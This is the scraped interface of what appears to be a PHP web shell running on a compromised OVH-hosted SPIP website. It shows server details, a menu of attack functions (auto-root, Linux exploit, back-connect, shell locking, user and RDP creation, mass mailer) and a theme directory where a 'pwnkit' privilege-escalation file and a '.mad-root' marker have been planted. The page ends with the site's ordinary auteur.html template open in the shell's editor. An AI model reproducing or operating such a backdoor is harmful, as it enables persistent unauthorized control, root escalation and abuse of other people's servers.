Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
squelettes-dist /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwx---r-x
formulaires
[ DIR ]
drwx---r-x
icon
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
inclure
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
modeles
[ DIR ]
drwx---r-x
polices
[ DIR ]
drwx---r-x
.editorconfig
300
B
-rw----r--
.gitattributes
85
B
-rw----r--
.gitignore
39
B
-rw----r--
.mad-root
0
B
-rw-r--r--
404.html
1.85
KB
-rw----r--
CHANGELOG.md
1.45
KB
-rw----r--
article.html
3.3
KB
-rw----r--
auteur.html
2.55
KB
-rw----r--
backend-breves.html
3.03
KB
-rw----r--
backend.html
1.47
KB
-rw----r--
backend.xslt.html
3.47
KB
-rw----r--
breve.html
3.02
KB
-rw----r--
calendrier.html
739
B
-rw----r--
composer.json
328
B
-rw----r--
contact.html
1.21
KB
-rw----r--
favicon.ico.html
97
B
-rw----r--
forum.html
2.18
KB
-rw----r--
ical.html
1012
B
-rw----r--
identifiants.html
1.31
KB
-rw----r--
inc-rss-item.html
2.28
KB
-rw----r--
mot.html
4.65
KB
-rw----r--
nouveautes.html
868
B
-rw----r--
paquet.xml
316
B
-rw----r--
plan.html
1.14
KB
-rw----r--
puce.gif
83
B
-rw----r--
puce_rtl.gif
84
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
recherche.html
3.78
KB
-rw----r--
robots.txt.html
536
B
-rw----r--
rss_forum_article.html
1.39
KB
-rw----r--
rss_forum_breve.html
1.35
KB
-rw----r--
rss_forum_rubrique.html
1.37
KB
-rw----r--
rss_forum_syndic.html
1.36
KB
-rw----r--
rss_forum_thread.html
1.38
KB
-rw----r--
rubrique.html
5.33
KB
-rw----r--
site.html
3.39
KB
-rw----r--
sitemap.xml.html
1.93
KB
-rw----r--
sommaire.html
2.24
KB
-rw----r--
spip.ico
4.19
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auteur.html
<BOUCLE_principale(AUTEURS) {id_auteur}> <!DOCTYPE html> <html dir="#LANG_DIR" lang="#LANG" class="[(#LANG_DIR)][ (#LANG)] no-js"> <head> <script type='text/javascript'>/*<![CDATA[*/(function(H){H.className=H.className.replace(/\bno-js\b/,'js')})(document.documentElement);/*]]>*/</script> <title>[(#NOM|couper{80}|textebrut) - ][(#NOM_SITE_SPIP|textebrut)]</title> <INCLURE{fond=inclure/head,robots=none} /> <link rel="alternate" type="application/rss+xml" title="[(#NOM|textebrut)]" href="[(#URL_PAGE{backend}|parametre_url{id_auteur,#ID_AUTEUR})]" /> </head> <body class="pas_surlignable page_auteur"> <div class="page"> <INCLURE{fond=inclure/header} /> <INCLURE{fond=inclure/nav,env} /> <main class="main" role="main"> [(#REM) Contenu principal : affichage de l'auteur ] <div class="wrapper"> <div class="content" id="content"> <p class="arbo"><a href="#URL_SITE_SPIP/"><:accueil_site:></a> > <:info_auteurs:>[ > <strong class="on">(#NOM|couper{80})</strong>]</p> <div class="vcard">[(#REM) microformat vcard] <div class="cartouche"> [(#LOGO_AUTEUR|image_reduire{224,*})] <h1 class="#EDIT{qui} fn">#NOM</h1> </div> [<div class="#EDIT{bio} texte note">(#BIO)</div>] [<p class="#EDIT{hyperlien} hyperlien"><:voir_en_ligne:> : <a href="(#URL_SITE)" class="url org spip_out">[(#NOM_SITE|sinon{[(#URL_SITE|couper{80})]})]</a></p>] </div>[(#REM) / vcard] [(#REM) Articles de l'auteur ] <B_articles> <div class="menu"> #ANCRE_PAGINATION <h2><:articles_auteur:> (#GRAND_TOTAL)</h2> <ul class="spip"> <BOUCLE_articles(ARTICLES) {id_auteur} {!par popularite} {pagination 10}> <li><a href="#URL_ARTICLE">#TITRE</a></li> </BOUCLE_articles> </ul> [<nav role="navigation" class="p pagination">(#PAGINATION)</nav>] </div> </B_articles> #FORMULAIRE_ECRIRE_AUTEUR [<div class="notes"><hr />(#NOTES)</div>] </div><!--.content--> </div><!--.wrapper--> <aside class="aside" role="complementary"> <INCLURE{fond=inclure/navsub} /> #FORMULAIRE_RECHERCHE [(#REM) Autres auteurs ] <B_auteurs> <div class="menu"> #ANCRE_PAGINATION <h2><:info_auteurs:></h2> <ul> <BOUCLE_auteurs(AUTEURS) {par nom} {pagination 20}> <li><a href="#URL_AUTEUR"[ class="(#EXPOSE)"]>[(#NOM|couper{80})]</a></li> </BOUCLE_auteurs> </ul> [<nav role="navigation" class="p pagination">(#PAGINATION)</nav>] </div> </B_auteurs> </aside><!--.aside--> </main><!--.main--> <INCLURE{fond=inclure/footer,self=#SELF} /> </div><!--.page--> </body> </html> </BOUCLE_principale>
Close